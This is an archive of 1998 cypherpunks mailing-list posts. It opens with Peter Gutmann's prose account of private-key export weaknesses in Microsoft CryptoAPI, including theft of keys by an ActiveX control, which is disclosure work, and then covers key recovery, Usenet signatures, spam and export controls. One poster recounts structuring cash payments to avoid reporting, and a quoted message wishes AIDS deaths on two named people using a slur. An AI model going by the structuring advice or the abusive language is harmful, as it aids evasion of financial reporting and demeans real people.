>provide protection of encrypted key material in Internet Explorer when using
>the standard Microsoft base CSPs. There were changes between Internet Explorer
>3.0x and Internet Explorer 4.x specifically to address any possible concern.

And the astounding thing was that, despite a complete rewrite of the code, the
newer version offers no extra security at all, as my article points out.  Both
are equally weak, you just need to attack them in slightly different ways.

>Key export attacks
>
>The original Internet posting raises concern about the CryptoAPI interface
>CryptExportKey().  This function is fully documented and does indeed export
>private key material in an encrypted format.

The statement from Microsoft omits one important point here.  Myself and
another security researcher have been trying to tell Microsoft for more than
four months (probably a lot longer, I didn't log the earlier mail) that this is
a very serious security flaw.  In all cases Microsoft's response was some
variation of "We don't see this as a flaw".  It wasn't until my warning was
published that they finally addressed the problem, and even in this case (the
program to set the CRYPT_USER_PROTECTED flag) it's only a quick hack to plaster
over the cracks and allow them to declare the problem fixed.  In fact it
doesn't fix the problem at all.  I'll post details in a fortnight or so when
I've had time to test things, please don't ask me about this until then.

>The presence of the CryptExportKey() function is to support functionality such
>as migrating key material between machines for a user or creating a backup
>copy of a key.  It should be noted however, that many CSPs, including most
>hardware based CSPs, do not allow exportable private keys and will return and
>error in response to a CryptExportKey() request.

However the CSP's installed by default on every recent system do allow the
export.  The fact that there may exist, somewhere, an implementation which
doesn't exhibit this flaw really doesn't help the majority of users.

>The posting also asserts that an ActiveX control could be downloaded from a
>web page, simply ask for the current users key, ship the key off for
>collection by an unscrupulous person, and then delete itself without a trace.
>
>If users run unsigned code, or code from an unknown origin, a number of
>unpleasant things can happen.  This could indeed occur if the key as been
>marked exportable and the CRYPT_USER_PROTECTED flag is not set.

Which was, until my warning, the automatic default action for Verisign, and is
still the automatic default for many other CA's.  This means that keys
generated right up until a few days ago (and in some cases keys being generated
right now) have, by default, no protection whatsoever.  In addition I've just
been sent mail to say that CRYPT_USER_PROTECTED still isn't the default with
Verisign, you have to click a box asking for extra security or you get the
usual default of no protection.

To add to the confusion, a lot of documentation (including the Microsoft
Developer Network (MSDN) online documentation on Microsofts web site) describes
the CRYPT_USER_PROTECTED flag with "The Microsoft RSA Base Provider ignores
this flag", which can cause programmers to leave it out when it is *essential*
it is always included.  Incidentally, MSDN also claims that Microsoft are
"supporting" PFX, which is in direct contrast with the claims in their press
release.

>There was also discussion of 16 dialog boxes appearing to the user for their
>password if the CRYPT_USER_PROTECTED flag is set. Certainly asking the user
>too many times would be better than too few times, however in our tests, under
>extreme (and uncommon cases), a user might be asked for their password at most
>four times when a key is used with the Microsoft base CSPs. Perhaps the claim
>came from an early beta release.

The 16 dialog boxes problem was present in 4.0, and it's been confirmed as
still being present in 4.01.  This was apparently verified on Microsoft's own
CryptoAPI mailing list (the claimed "beta" version was actually MSIE 4.0
final).

>Microsoft is constantly working to improve the security of our products.

Myself and another person had been trying to convince Microsoft for more than
four months that things like CryptExportKey() are a major security hole.  Their
response each time has been some variation of "We don't see this as a problem".
It simply wasn't possible to get them to acknowledge these flaws, therefore my
posting of the details wasn't "irresponsible" (as some have claimed) but a
necessity in order to get them fixed.  When I pointed out several months ago
that Microsoft were using, in their pre-4.x products, an exported key format
which was identical to the one which I broke more than 1 1/2 years ago, their
response was "What's the problem with this?".  I would have liked to have
included URL's for the CryptoAPI mailing list archives to prove that Microsoft
were warned of these problems some time ago, but the CryptoAPI archive seems to
be temporarily offline.

Risks of a Private Key Compromise
---------------------------------

One or two respondents have tried to play down the seriousness of a private key
compromise, saying that I exaggerated the dangers in my original message.  What
I wanted to point out was how extremely valuable a users private key is, and
how disappointingly little concern Microsoft seem to have for protecting this
valuable resource.  For example Garfinkel and Spaffords "Web Security and
Commerce" (O'Reilly, 1997) contains the warning:

  "Today's PC's are no better at storing private keys once they have been
  generated.  Even though both Navigator and Internet Explorer can store keys
  encrypted, they have to be decrypted to be used.  All an attacker has to do
  is write a program that manages to get itself run on the users computer (for
  example by using [...] Microsoft's ActiveX technology), waits for the key to
  be decrypted, and then sends the key out over the network" (p.120).

Including a function like CryptExportKey() (which hands over a users private
key) makes this very attack possible.  The potential damage which can be caused
with a misappropriated private key is enormous.  Consider the relative risks in
the compromise of a logon password and a private key.  With a logon password,
the worst an attacker can do (apart from stealing possibly valuable data) is to
trash the victims hard drive, which involves reinstalling the operating system
(an action which many users are intimately familiar with).  In contrast an
attacker who obtains a private key can potentially drain the victims credit
card, clean out their bank account (if the victim uses one of the emerging
online banking services), sign documents in their name, and so on.

The implications of that last point can be quite serious.  Take for example the
Utah digital signature act, which was used as a model by a number of other
states who implemented or are implementing digital signature legislation.
Under the Utah act, digitally signed documents are given the same evidentiary
weight as notarised documents, and someone trying to overcome this has to
provide "clear and convincing evidence" that the document is fraudulent, which
is difficult since it bears a valid signature from the users key (this fact has
been used in the past to criticise digital signature laws based on this act).
In addition, under the Utah act and derived acts, anyone who loses their
private key bears unlimited liability for the loss (in contrast, consumer
liability for credit card loss is limited to $50).  This leads to the spectre
of a malicious attacker who has the ability to issue notarised documents in
your name for which you carry unlimited liability.  This is a lot more
important than someone reformatting your hard drive, or stealing last months
sales figures.

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 4 Feb 1998 15:14:21 +0800
To: sorrin@syndata.com (steve)
Subject: Re: BSAFE 4.0 to force GAK?!
In-Reply-To: <34D75774.6036@syndata.com>
Message-ID: <199802040709.CAA03985@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



One would hope that this simply drives the market towords using
DSA/DH from toolkits like those available with support from Baltimore,
PGP, CryptoMathic, etc.  (I maintain a list of free and commercial
crypto libraries at www.homeport.org/~adam/crypto.  The list is
oriented at hackers and cypherpunks, and so gives far more  detail on
the free libraries.)

Theres no reason to be using BSAFE if it enforces Uncle Sam's
ludicrous political requirements.  Use a library from the free world.
Use algorithms that are not encumbered.  Theres no longer any reason
not to. 

Adam


steve wrote:
| FYI
| 
| Jan. 26's Network World has an article on page 33 titled "RSA blasts
| (but also supports) Government encryption policy".
| 
| The paragraph of note is the fourth paragraph which reads:"The next
| version of the RSA encryption toolkit, BSAFE 4.0, will force those
| building products with anthing over 56 bit strength encryption to use a
| key-recovery center for exportable products...."
| 
| I haven't been able to confirm this with other sources yet but the
| glaring question is how will this be enforced and how will it affect
| domestic products that wish to use BSAFE 4.0 for their crypto. Further
| what ramifications does this hold for their S/Mail toolkit for S/MIME?
| and I haven't seen this discussed on the list yet.
| Steve O
| -- 
| A picture tells a thousand words.
| 		Stego
| 
| 
|      -----BEGIN GEEK CODE BLOCK-----
|      Version: 3.1
|      GCS/IT/S d--() s+: a-- C++++(++)$ ULS+++@ P++@ L+(++)$ E- W+(+++)$
|      N++$ !o K-? w++(+++)$ !O+>++ !M !V PS+(+++)@ PE(++)@ Y++$ PGP@ t+@
|      5++@ X++>$ R+++>$ tv+@ b+@ DI+++>$ D+++@>$ G@ e++@>++++ h r* y+ 
|      ------END GEEK CODE BLOCK------
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Wed, 4 Feb 1998 16:34:57 +0800
To: cypherpunks@cyberpass.net>
Subject: Re: The Continued Attack on Cash (Was: "The Right of  Anonymity"...)
In-Reply-To: <199802040735.CAA04108@homeport.org>
Message-ID: <19980204.080636.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
> At 06:07 PM 2/2/98 +0000, Attila T. Hun wrote:
> >    I did-- tried to lay $14K out for a Mercedes (25 years ago).
> >    they wouldnt take it.  so I went and picked up two $7K
> >    cashiers from two different banks.  same thing with a pair
> >    of Lycoming IO540 aircraft engines:  2 8s and a 9 --stay
> >    under the $10K transaction.
> 
> Careful.  This may well be illegal now.  
> Structuring transactions to avoid
> reporting requirements is a felony.
>   
    statute of limitations has run. at the time, I did not
    give it much thought except the aggravation of filing the
    paperwork for what was a common business transaction. It
    was actually easier to get cash in las vegas than a cashiers
    check as the banks were so pissy.  the casinos were far 
    better than the banks once you established out of town
    credit with them --and they were 24 hours a day, 7 days a 
    week. I wanted those aircraft engines bad --the vendor in
    Chicago had the only two available for close to six months
    and he had agreed to sell them to Canada but was waiting
    on the letter of credit --the casinos wired the money direct 
    which turned the deal --the engines were on a return flight 
    the next morning --a Saturday. transferring money from a
    casino is not the best place in the world for obvious 
    reasons, despite its expediency.

    structuring transactions is certainly illegal now, but I 
    have not seen that kind of money since retiring after
    having had a run of bad luck with my health a few years 
    back (and lost my FAA medical cert).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNNgm3rR8UA6T6u61AQET5gH6An6jxz5lkdghl6BXbHZ3tFCGu7iam32F
knFYLLWGSYngkRH6k4x7/zXA0SH7ghZ5b33gKlX98oWx7NKyOXLZuw==
=5RqA
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lutz@belenus.iks-jena.de (Lutz Donnerhacke)
Date: Wed, 4 Feb 1998 17:43:52 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Spammers
In-Reply-To: <v03102807b0fcd856e294@[207.79.65.77]>
Message-ID: <slrn6dgdsq.17a.lutz@belenus.iks-jena.de>
MIME-Version: 1.0
Content-Type: text/plain



* Bill Stewart wrote:
>If you want to cut way down on spam, there's Paul Vixie's
>Realtime BlackHole List service at maps.vix.com.  It uses DNS as a 
>convenient query/response server and some short sendmail scripts
>to block mail from any site known to have an open smtp relay.

I prefer teergrubing. It does increase the realtime costs of spamming. A lot
of professional spammers are teergrube aware and do not spam to such hosts.
Unsecure relays die by a lack of ressources after catched by some
teergrubes, so the admin has to do something to deal with the problem.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lutz@belenus.iks-jena.de (Lutz Donnerhacke)
Date: Wed, 4 Feb 1998 17:44:25 +0800
To: cypherpunks@Algebra.COM
Subject: Re: RSA? ElGamal?
In-Reply-To: <50c47d8978815f7c5bf17e92e5e71bcc@anon.efga.org>
Message-ID: <slrn6dgdtg.17a.lutz@belenus.iks-jena.de>
MIME-Version: 1.0
Content-Type: text/plain



* Anonymous wrote:
>Is ElGamal secure than RSA ?

It's different. That's all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 8 Feb 1998 12:38:51 +0800
To: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Subject: Re: An update on MS private key (in)security issues
In-Reply-To: <88650932615058@cs26.cs.auckland.ac.nz>
Message-ID: <199802031440.JAA09009@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <88650932615058@cs26.cs.auckland.ac.nz>, on 02/04/98 
   at 01:35 AM, pgut001@cs.auckland.ac.nz (Peter Gutmann) said:

>The implications of that last point can be quite serious.  Take for
>example the Utah digital signature act, which was used as a model by a
>number of other states who implemented or are implementing digital
>signature legislation. Under the Utah act, digitally signed documents are
>given the same evidentiary weight as notarised documents, and someone
>trying to overcome this has to provide "clear and convincing evidence"
>that the document is fraudulent, which is difficult since it bears a
>valid signature from the users key (this fact has been used in the past
>to criticise digital signature laws based on this act). In addition,
>under the Utah act and derived acts, anyone who loses their private key
>bears unlimited liability for the loss (in contrast, consumer liability
>for credit card loss is limited to $50).  This leads to the spectre of a
>malicious attacker who has the ability to issue notarised documents in
>your name for which you carry unlimited liability.  This is a lot more
>important than someone reformatting your hard drive, or stealing last
>months sales figures.

I have raised concerns in the past over the rush to pass Digital Signature
Laws in various states. These laws have not been well though out nor did
they stand the rigors of peer-review of the crypto community before they
were passed into law. IIRC one of the states considered *encryption* alone
to be a *legal* signature!!!

I will not be using digital signatures for anything other than
authentication of messages. For legal documents I will stick to the old
fashion pen and paper with witnesses and a notary.

Just as a side note: Micro$loth is unfit to secure an outhouse let alone
somthing as important as network and data security (are these fools still
claiming C2 for NT?). I have never seen such overwhelming incompetence and
complete arrogance than what is centered in Redmond (IBM may be arrogant
but at least they are technically competent). 

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  WINDOWS?!?  Hahahahahehehehehohohoho...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNNcZF49Co1n+aLhhAQHZGAP/d5qdnlJYEt6uXh2srSf2ELc4rAle9aX5
p49t7PgGIaCpMY8YIYsFS5+nFoeHwUmlBNrEvUJQoQ2jrEgUp7B7Xv+VZB38qLma
L0oeyICDe7bw6iMjKJ88gsqcHSghPhu7qhSI68e7CffwBWDh3N4Uc5PMQSMzztLZ
GdKH6QmvN7k=
=NV74
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James F. Marshall" <marshall@ibm.net>
Date: Thu, 5 Feb 1998 11:53:32 +0800
To: "Cypherpunks Unedited List" <cypherpunks@toad.com>
Subject: Changing to Moderated Cypherpunks -- How?
Message-ID: <199802050343.DAA46984@out5.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Too much noise in the unedited list.

How does one change to the moderated list?

- -- James F. Marshall, Esq., Pasadena, California
   Subject "JFM Public Key" for PGP Public Key

- -- OS/2 is to Windows as Stradivarius is to Yamaha

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNNf8UjbjGennrhqZAQETXgP/WFshRowrhi7qMnUZHUIADA7cCV0fEYFA
WiAlynovwU9dyvc/gygz9N6aeJO/ghqiQl2/NqCSsKn5H1nTr1MHbK2iYJwt6AXh
ZhMSfz5p1QzVWwm9lIFETipPayuJ+WzCkaakMZP3PPZXG8XUT/48NZG5hJgjfIM7
vqzMkCcHr+A=
=2N5t
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 5 Feb 1998 13:27:04 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Airline ticket information -- help
In-Reply-To: <v03102802b0fbbf3bf77c@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.980204100422.29752B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Or you could just call up the airline and pretend you are Tim May, and 
they will tell you.  ;)

On Mon, 2 Feb 1998, Tim May wrote:

> At 9:55 AM -0800 2/2/98, Declan McCullagh wrote:
> >I'm trying to find out what airline flight someone is taking. I have a name
> >and know the general travel plans and likely date. How can I find out the
> >airline, flight number, and seat number? This is somewhat urgent. (You have
> >my assurance that the purpose is legit.)
> >
> >If anyone has any ideas, I'd appreciate the help.
> 
> Monica Lewinski and William Ginsburg are travelling on American Airlines
> Flight 420 on Wednesday, 4 February, departing Dulles Airport at 10:45
> a.m., EST, and arriving LAX at 3:35 p.m., PST.
> 
> Good luck reporting on them, Declan!
> 
> 
> --Tim May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Thu, 5 Feb 1998 03:53:57 +0800
To: dlv@bwalk.dm.com
Subject: Re: RIP, Carl Gorman, Code Talker
Message-ID: <199802041932.LAA02327@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh-Oh!

Us "newbies" slipped up.  Except, when I signed up, my entry notice said:

"To post to the whole list, send mail to

	cypherpunks@toad.com"

Soooo, maybe you want we should send it elsewhere, to the same lists you
send to, you should publish the correction, not just flame ...

Until then, we just have to do as told by the list-admin ...

On Sat Jan 31 12:20:56 1998 Dr.Dimitri Vulis wrote:
> From dlv@bwalk.dm.com Sat Jan 31 12:20:56 1998
> To: cypherpunks@toad.com
> Subject: Re: RIP, Carl Gorman, Code Talker
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Comments: All power to the ZOG!
> Date: Sat, 31 Jan 98 14:23:21 EST
> 
> Tim May <tcmay@got.net> writes:
> 
> > (As Gary seems to be a newcomer, let me remind him and others that
> > "cypherpunks@toad.com" is not the place to send messages to the list.
> > Please use one of the distributed addresses.  It's been a year since the
> > list moved off of toad.com. I wish John would just start bouncing messages
> > sent to toad.com and be done with it.)
> 
> When are cocksuckers John Gilmore and Guy Polis planning to die from AIDS?
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>

Ciao,
Bob De Witt,
rdew@el.nec.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 03:05:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Fountain of youth found? [SciAm] (fwd)
Message-ID: <199802041901.NAA05823@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-tesla@ssz.com Wed Feb  4 13:00:02 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802041857.MAA05778@einstein.ssz.com>
Subject: Fountain of youth found? [SciAm]
To: tesla@ssz.com (Experimental Instrumentation)
Date: Wed, 4 Feb 1998 12:57:23 -0600 (CST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 2511      
Sender: owner-tesla@ssz.com
Precedence: bulk
Reply-To: tesla@ssz.com


Note this file has been edited.

Forwarded message:

> X-within-URL: http://www.sciam.com/explorations/1998/020298telomere/

>    Telomere Image: Southwestern Medical Center
>    
>    LIFE'S CLOCK. Telomeres are repeating DNA strings (TTAGGG) that cap
>    chromosomes. Each time a mortal cell divides, its telomeres become
>    shorter. When they reach a preset length, the cell ceases to divide,
>    ages and dies.
>    
>   Scientists have found a major factor
>   that controls whether a cell dies or thrives
>   
>    It may not sound as appetizing as aquavit, but telomerase--an enzyme
>    discovered only a decade ago in a single-celled protozoan--may well be
>    the elixir of youth. This chemical acts in immortal cancer cells,
>    sperm and ovum to repair telomeres, the strands of DNA that tie up the
>    ends of chromosomes. And now it seems that activating telomerase in
>    sundry other cells grants them a longer lease on life as well.
>    
>    The finding, which was published in the January 16 issue of Science,
>    finally proves what was a highly controversial model linking telomeres
>    to cellular aging. More important, it opens up new avenues for
>    research into diseases that occur when cells grow old, including
>    macular degeneration in the eye and atherosclerosis, and those that
>    arise when cells don't age at all, such as cancer.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 5 Feb 1998 02:33:23 +0800
To: cypherpunks@toad.com
Subject: Rogue EFF Dir Brad Templeton
Message-ID: <199802041809.NAA09228@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



This jerk should be kicked out of EFF.


Brad had stated he wants to eliminate one-way anonymous remailers,
make two-way anonymous remailer users identify themselves as the
same person every time they use one, and:

   o require digital signature identification for all email
   o require digital signature identification for all Usenet posts


--------- previously shown -------------

Brad Templeton emailed:
*   Information Security emailed:
 
*   > Nor does your digital signature idea do anything to prevent
*   > throw-away accounts from doing major spams; you'll have to
*   > put even MORE controls on people.
*
*   Correct, no throw away accounts.  It's coming.
*
*   > The digital signature idea is an astonishingly bad idea, that
*   > only frustrated control-freaks will accept.
*
*   You are mistaken.  I surveyed a roomful of usenet admins at a
*   conference last year.  They were 95% in favor of it.
 
[I replied that those were the control-freaks I was talking about]
 
 
 
Brad Templeton emailed, formatted by guy:
 
>   As far as I am concerned, no fake addresses is one of my non-negotiable
>   requirements, because
>
>      the eventual USENET is going to have digital signature requirements.
>
>   It's the only way to stop [people from] posting under fake addresses
>   where we can't find them, and that means stopping honest users from
>   doing it too.
 
[I said false: ALL problem posters are locateable to their ISP]
 

 
    http://www.clari.net/brad/spam.html [snipped] [by Brad]
 
    Solutions...
 
    First, improve internet mail systems and protocols to
    identify mail with a fake or forged return address.
 
    There are some simple steps to do this, and
    eventually digital signature allows complete
    verification of the sender.
 
    http://polka.clari.net/usenet-format/cert.html
 
    Q: What about anonymous remailers?
 
    A: A person with an anonymous address that sends mail back will
    probably be able to get a certificate. They can post without revealing
    their name, except perhaps to the person who gives them a certificate.
    Digital signature works fine to prove the same person sent two messages
    without saying at all who that person is in the real world.
 
Forced to authenticate they are the same
person, even through the anonymous remailer.


--------- end of previously shown -------------

 
What's new is Brad has inserted his declaration that access
to the Net must require you to authenticate yourself with
a digital signature to post to Usenet in the draft text
for the new Usenet RFC, which he is heading:

Brad's draft Usenet digital signature text:

#   Systems MAY insist that an article be signed, at least the
#   body and the minimal header set, or they MAY reject the
#   article.  This policy may vary from group to group and
#   subnet to subnet.  Eventually it is expected that a site
#   SHOULD reject any article that is not signed.

Hey, fine if an individual group wants to vote it in.

But ALL OF USENET???

I asked him if he would change the wording to:

#   An individual group MAY insist that an article be signed,
#   at least the body and the minimal header set. This is
#   subject to the normal news standards of users of a group
#   deciding this issue themselves.

Dead silence.

He REFUSES TO DISCUSS the last statement:

#   Eventually it is expected that a site
#   SHOULD reject any article that is not signed.

It is a purely political statement on his part,
pushing his vision of a tightly authenticated
Net, like they have in China.

In fact, it is utterly clueless of him, especially since he
was one of the original CDA plaintiffs. [Not to mention it
is an "agreement to make an agreement"]

NONE of the other list participants has said they agree everyone
should authenticate themselves using digital signatures for all
Usenet posts, which is the language I am contesting.

Yet, he won't even discuss the ramifications.

Yep, power corrupts: he's running the show, and answers to no one.

------- begin Crypto Manifesto excerpt -------
 
*       Sandia and Coms21, currently engaged in an agreement to support the
*   People's Republic of China's driver license and national ID card
*   program, have partnered to create a fraud-proof solution for on-the-spot
*   positive identification of card bearers.
 
*   "China Tells Internet Users To Register With Police"
*   The New York Times, 2/15/1996
*
*   China ordered all users of the Internet to register with the police, as
*   part of an effort to tighten control over information.
*
*   The order came from the Ministry of Public Security.
*
*   Network users have been warned not to harm national security, or to
*   disseminate pornography.
 
Well, there's a new way to control Internet users: require them to identify
themselves, no doubt your U.S.-created National ID Card will be required for
access. That ought to stop pornography: identify each and every user.
 
#   "The Great Firewall of China", by Geremie R. Barme & Sang Ye, Wired, 6/97
#
#   Xia Hong, China InfoHighway's PR man: "The Internet has been an important
#   technical innovator, but we need to add another element, and that is
#   control. The new generation of information superhighway needs a traffic
#   control center. It needs highway patrols; USERS WILL REQUIRE DRIVER'S
#   LICENSES. THESE ARE THE BASIC REQUIREMENTS FOR ANY CONTROLLED ENVIRONMENT."

The Supreme Court's CDA ruling:

Once most people are fingerprinted, a cheap (say $50) fingerprint scanner that
attaches a timestamp and government digital signature will be sold for allowing
Internet access to "adult" locations---chat rooms, USENET, WWW sites---and it
will be mandatory. The Chief Justice of the U.S. Supreme Court said as soon
as the "Internet driver's license" is technically feasible, CDA becomes legal.
 
   "Such technology requires Internet users to enter information about
    themselves--perhaps an adult identification number or a credit card
    number--before they can access certain areas of cyberspace, 929 F. Supp.
    824, 845 (ED Pa. 1996), much like a bouncer checks a person's driver's
    license before admitting him to a nightclub."

------- end Crypto Manifesto excerpt -------


If everyone has a digital signature, CDA becomes legal.

I do wish EFF would kick him out!
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Thu, 5 Feb 1998 02:57:46 +0800
To: cypherpunks@ssz.com
Subject: Cryptography empowering human rights.
Message-ID: <34D8B729.36322685@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



Looking for opinions and leads to resources about human rights and the
potential abuse of said rights with public key 'escrow' or  recovery
agents.  Please send info to:
mailto:webwarrior3@infowar.com

Thanks in advance,
Scott R. Brower
Electronic Fronteirs Florida
http://www.efflorida.org
effla@efflorida.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <sorrin@syndata.com>
Date: Thu, 5 Feb 1998 03:10:43 +0800
To: <cypherpunks@Algebra.COM>
Subject: HUMOR: Bill Gates gets it, True CNN Story!!
Message-ID: <19980204190827281.AAA314.381@endor.syndata.domain>
MIME-Version: 1.0
Content-Type: text/plain



http://www.cnn.com/TECH/computing/9802/04/belgium.gates.ap/


A Picture Tells A Thousand Words.
                    STEGO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfrancis@netscape.com (Joe Francis)
Date: Thu, 5 Feb 1998 06:40:15 +0800
To: cypherpunks@toad.com
Subject: implementing an export control policy on a web site
Message-ID: <34D8EB6F.3B6EA5C8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



I am seeking information on what constitutes legal conformance to U.S.
ITAR when webserving encryption software from within the U.S.

I have read pretty much everything I can find online that looked like it
might be relavent.  Apologies if this is a FAQ that I have some how
missed.

Part of my confusion stems from the different policies implemented by
different vendors on their sites, and also by how those policies have
changed over time.  For instance, at Netscape one has to provide a
tremendous amount of personal info in order to download the domestic
version of Communicator.  Phone number is required, and there appears to
be some automated sanity checking on the phone number/address supplied.
This is a sharp contrast to the Cypherpunks Home Page
(ftp://ftp.csua.berkeley.edu/pub/cypherpunks/Home.html), where a simple
request not too export and an explanation of the ITAR appears to be all
that is done.  PGP has yet a different standard, directing you to the
MIT page which eventually leads to a form (at
http://bs.mit.edu:8001/pgp-form.html) that forces you to affirm your
citizenship, agree to obry ITAR and obey the RSAREF license, and state
that you will only use PGP for noncommercial use.  It then appears to do
some minimal checking of your ip name/address (it would allow me to
download from netscape.com but not from ricochet.net).

If anyone can point me at any legal analysis of these different
approaches, or has any info to offer on the matter, I'd love to hear
about it.

thanks,
Joe Francis






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 5 Feb 1998 07:41:31 +0800
To: cypherpunks@toad.com
Subject: Feds Approve Bank to Certify Digital Signatures
Message-ID: <3.0.5.32.19980204153030.0084c570@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



There was a note to Dave Farber's list that the Office of the 
Comptroller of Currency has approved Zion's First National Bank
to certify digital signatures.  Since they're in Utah, Zion's has
a certain amount of legal infrastructure in place.
The text version of the story is at 
http://www.occ.treas.gov/ftp/release/98-4.txt
and the 20-page PDF with gory details is at
http://www.occ.treas.gov/ftp/release/98-4att.pdf

They're going to offer digital signature certificates
with the usual binding of a key to a body plus papers,
and provide software to support it.  Some of their software
can be used for encryption, and unfortunately they're
going to offer key escrow, though as a separate business
service, with keys encrypted by the key's corporate owner
as well as by the bank for protection, but it's not
going to be a mandatory service, and they have no intention
of offering escrow for signature keys, only encryption keys.
Their documentation does talk a good bit about crypto technology,
in layman's terms, and about risk management and Y2000 compliance,
and also in great detail about how things like this are
standard banking functions applied in a digital environment
(to convince the OCC to let them offer it, since they're a bank
and aren't supposed to offer non-bank-related services).

There's also a story in Network World at
http://www.nwfusion.com/news/0202rsa.html
about Verisign and Entrust CAs plans for IPOs.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 06:28:27 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...) (fwd)
Message-ID: <199802042228.QAA06832@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Attila T. Hun" <attila@hun.org>
> Date: Wed, 04 Feb 98 22:14:36 +0000
> Subject: Re: The Continued Attack on Cash (Was: "The Right of Anonymity"...)

> >You don't know Texas or Texans very well...
> 
>     well, I do, real well  --but you dont know rural Utahns.

Actualy I do, know quite a few people in Utah; both in and out of the Mormon
Church and in and outside the handfull of cities.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 5 Feb 1998 06:31:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The Continued Attack on Cash (Was: "The Right of (fwd)
Message-ID: <199802042230.QAA06881@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

